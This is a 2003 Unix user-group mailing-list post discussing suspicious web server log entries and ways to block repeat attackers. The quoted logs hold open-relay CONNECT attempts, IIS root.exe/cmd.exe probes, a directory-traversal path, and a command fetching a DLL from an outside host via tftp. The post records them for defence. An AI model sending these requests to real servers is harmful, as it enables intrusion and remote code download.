[H-GEN] weird web server logs

Sun Feb 23 05:29:03 EST 2003

[ Humbug *General* list - semi-serious discussions about Humbug and     ]
[ Unix-related topics. Posts from non-subscribed addresses will vanish. ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Tony Nugent wrote:
| First exploit
| -------------
|
| Essentially this is a spammer open relay attempt, used like this to
| hide its true origin.
|
|   (I've seen this sort of exploit used with web proxy servers that
|   have poor ACLs to prevent CONNECT from unauthorised sources... in
|   this case the target server happens to be smtp-gw-4.msn.com).
|
| It's interesting to see this attempt to use the web server as a
| proxy...  perhaps this exploit is looking for proxy servers
| listening on port 80?  Or is CONNECT a valid http method?
|
	Haven't had too many of these, but we've had people try to use GET
methods for a similar purpose, our hit counter gets them every time.
I've had several trying to exploit one of Micro$loth's mail servers, a
couple exploiting a FTP server, and a few exploiting some other sites.
Every time, they get our website, and trigger our hit counter, nice eh. ;-)

Actually, just looking at my logs now, what do you make of these: (I've
tabbed them out for readability)

customer79-153.iplannetworks.net - -
	[23/Feb/2003:13:13:35 +1000]
	"CONNECT maila.microsoft.com:25 HTTP/1.0"
	405 315 "-" "-"

hse-ottawa-ppp162535.sympatico.ca - -
	[23/Feb/2003:15:27:42 +1000]
	"CONNECT maila.microsoft.com:25 / HTTP/1.0"
	405 315 "-"
	"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

202.103.38.170 - -
	[23/Feb/2003:11:05:09 +1000]
	"GET /scripts/root.exe?/c+dir
	HTTP/1.0" 200 1827 "-" "-"

202.103.38.170 - -
	[23/Feb/2003:11:05:15 +1000]
	"GET
/scripts/root.exe?/c+tftp%20-i%20202.114.40.182%20GET%20cool.dll%20httpodbc.dll
HTTP/1.0"
	200 1882 "-" "-"

202.103.38.170 - -
	[23/Feb/2003:11:05:17 +1000]
	"GET /scripts/httpodbc.dll HTTP/1.0" 200 1824 "-" "-"

This command is common:
202.103.38.170 - -
	[23/Feb/2003:11:05:19 +1000]
	"GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 1825 "-" "-"

202.103.38.170 - -
	[23/Feb/2003:11:05:22 +1000]
	"GET
/MSADC/root.exe?/c+tftp%20-i%20202.114.40.182%20GET%20cool.dll%20httpodbc.dll
HTTP/1.0"
	200 1880 "-" "-"

202.103.38.170 - -
	[23/Feb/2003:11:05:24 +1000]
	"GET /MSADC/httpodbc.dll HTTP/1.0"
	200 1822 "-" "-"

202.103.38.170 - -
	[23/Feb/2003:11:05:27 +1000]
	"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
	301 350 "-" "-"

	It makes me wonder if I should confuse their hacking utility by making
a smart-arsed CGI script called cmd.exe...  They'll try just about every
conceivable combination which makes me wonder if this is a utility doing
this, not a raw telnet terminal.  The lack of a HTTP User Agent here
seems to support this theory.

| Second exploit
| --------------
|
| This is an obvious "root-access" attempt to exploit problems with
| vulnerable versions of m$-IIS.
|
| The full first and last log of an event is recorded here to
| illustrate the total time (10 seconds).  Below that is a summary of
| the "file not found" errors.  This can happen several times/day,
| from different IPs, and like this one the src IP does not resolve.
|
| ==> /var/log/httpd/error_log <==
| [Mon Feb 17 05:35:55 2003] [error] [client 203.250.76.140]
|   File does not exist: /var/www/html/scripts/root.exe
| ...
| [Mon Feb 17 05:36:05 2003] [error] [client 203.250.76.140]
|   File does not exist:
/var/www/html/scripts/..%2f../winnt/system32/cmd.exe
|
| I'd really like to have web server outright refuse to respond to
| these sorts of queries... is possible to get apache to automatically
| block (or ignore) IPs that do this - especially not to respond with
| any error message (ie, ignore the request)?
|
| Cheers
| Tony

	Yes, we've actually had someone in Thailand attempt over 300 times
along with hundreds of others (much to my amusement), to get into our
server, without success.  As far as blocking this sort of thing, I did
manage to make a perl script which watches the apache logs and uses the
iptables command under Linux to block people after 5 attempts.

	However, in the case of 'the Thai Crusader' (as one of my mates dubbed
this individual - hacking from the Communications Authority of Thailand)
this wasn't much of a deterrant, I still had this person from this one
particular IP, attacking, 5 attempts per hour (my script blocks hackers
for a hour and forgets after a day).

We've also had people hacking from Korea, China, India, Indonesia, the
Carribean, and the US - but mostly in Asia.

I'm running Apache 2.0.40 under RedHat Linux 8.0 -
http://longlandclan.hopto.org/

	I'll have to iron out some of these scripts because they're actually
designed for Apache 1.3 (I first made them on our Slackware 8.0 box
running Apache 1.3.26) and make them more user friendly but if the
interest is out there, I can publish them.

	I've also got a PHP script which works as an error 404/400 page and
will do a whois lookup on the IP and send me an email with all the
details.  Again, this will have to be cleaned up, but should work on any
Unix system (although it's designed for Linux).  RedHat actually
partially broke this script because their version of whois requests the
info from the wrong server, and as a result, it obtains nothing, (any
ideas on how I can specify a list of servers to query?) but everything
else works.

- --
+-------------------------------------------------------------+
| Stuart Longland           stuartl at longlandclan.hopto.org |
| Brisbane Mesh Node: 719             http://stuartl.cjb.net/ |
| I haven't lost my mind - it's backed up on a tape somewhere |
+-------------------------------------------------------------+
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQE+WKJuIGJk7gLSDPcRAgGdAJ4gTGkDd+DCdHeXkvaD4QFCz4EE4ACfRw6R
1dqy91Z99nfWdsPWwYRPWKk=
=Oujg
-----END PGP SIGNATURE-----

--
* This is list (humbug) general handled by majordomo at lists.humbug.org.au .
* Postings to this list are only accepted from subscribed addresses of
* lists 'general' or 'general-post'.  See http://www.humbug.org.au/